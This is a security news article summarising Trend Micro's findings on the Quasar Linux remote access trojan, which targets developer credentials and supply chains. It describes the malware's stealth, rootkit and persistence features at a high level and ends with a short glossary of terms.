Shadow Code: How the Quasar Linux RAT Infiltrates Developer Pipelines
Subtitle: A stealthy new malware targets the heart of the software supply chain, putting developer credentials-and the wider ecosystem-at risk.
It starts with a silent breach-lines of code slipping unnoticed into a developer’s machine. But this isn’t just another malware scare: the newly discovered Quasar Linux (QLNX) Remote Access Trojan (RAT) is engineered to burrow deep, steal the digital keys to the kingdom, and potentially poison the very software millions rely on.
According to Trend Micro researchers, QLNX is not your average backdoor. Its primary mission: steal the credentials, keys, and tokens that grant access to critical development tools, cloud infrastructures, and code repositories. With these, attackers don’t just compromise a single machine-they can hijack an entire software supply chain.
The implications are chilling. By infiltrating a developer’s workflow, QLNX gives adversaries the power to silently insert malicious code into legitimate software packages, potentially reaching thousands-or millions-of unsuspecting users downstream. The malware specifically hunts for sensitive credentials tied to platforms like AWS, Kubernetes, Docker Hub, Git, NPM, and PyPI. If compromised, these accounts can be weaponized to push malicious updates or pivot into production cloud environments.
QLNX’s technical sophistication is formidable. It operates entirely in memory, erasing its tracks by spoofing process names and deleting itself when needed. System reconnaissance routines identify containerized environments, while a two-tier rootkit system-combining userspace hooks and kernel-level eBPF map controllers-hides processes, files, and network ports from prying eyes. The malware even clears system logs to further cover its tracks.
Credential theft is enabled through two distinct Pluggable Authentication Module (PAM) backdoors, capable of capturing plaintext passwords, SSH sessions, and authentication tokens. The malware’s arsenal includes 58 command options, ranging from file manipulation and screen capture to remote shell access and keystroke logging-enough to grant attackers near-total control over compromised machines.
Persistence is another hallmark. QLNX can embed itself using up to six different mechanisms-like crontab entries, init scripts, and service files-ensuring it survives reboots and system cleanups. Its modular design allows attackers to deploy multiple persistence methods simultaneously, making eradication a formidable challenge.
As supply chain attacks escalate, QLNX is a stark reminder: the tools that build our digital world are increasingly targeted. With its blend of stealth, persistence, and credential theft, QLNX marks an evolution in how cybercriminals aim to compromise not just individuals, but the very backbone of software infrastructure. For developers and organizations alike, vigilance is no longer optional-it’s essential.
WIKICROOK
- Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
- Rootkit: A rootkit is stealthy malware that hides itself on a device, allowing attackers to secretly control the system and evade detection.
- Pluggable Authentication Module (PAM): PAM is a Linux framework that lets administrators integrate various authentication methods, like passwords or biometrics, into system services without changing application code.
- eBPF: eBPF is a Linux kernel technology for running secure, sandboxed programs, enabling advanced monitoring, tracing, and security features without kernel changes.
- Persistence Mechanism: A persistence mechanism is a method used by malware to stay active on a system, surviving reboots and removal attempts by users or security tools.




